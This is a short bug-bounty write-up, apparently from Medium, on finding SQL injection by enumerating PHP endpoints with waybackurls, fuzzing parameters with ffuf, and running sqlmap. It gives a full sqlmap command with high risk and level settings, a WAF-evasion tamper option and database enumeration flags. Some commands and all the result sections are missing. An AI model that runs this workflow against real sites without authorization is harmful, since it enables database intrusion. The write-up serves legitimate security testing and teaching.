How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes

Enumeration Phase:

I started to look at the web archive of the target with the waybackurls tool, I found a bunch of endpoints, but I observed a lot of PHP files!! Mmmmm, maybe I find SQL Injection in one of those, Ok Let’s filter the output. so my command will be:

uro is a tool used to delete duplicate urls

Getting Parameters:

Firstly, we need to grep only lines which contain get string and delete all before it and make it unique to avoid the duplicate, so our command will be: $ cat php-files.txt| grep -i get | sed ‘s/.*.get//’ | sort -u

ffuf -w lowercase-parameters.txt -u ""
ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u ""


The command will be:

sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms=”MYSQL” --hostname --current-user --current-db --dbs --tamper=between --no-cast
--level 5 --> Level of tests to perform.
--risk 3 --> Risk of tests to perform
--dbms --> back-end DBMS value
--no-cast --> to avoid use cast-alike statements during data fetching
--tamper --> to evade filters and WAF’s
"--hostname --current-user --current-db --dbs" --> to retrieve info about the database
#1st SQLI
#2nd SQLI
#3rd SQLI
#4th SQLI



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mahmoud Youssef

Mahmoud Youssef

Cyber Security Researcher | Bug Hunter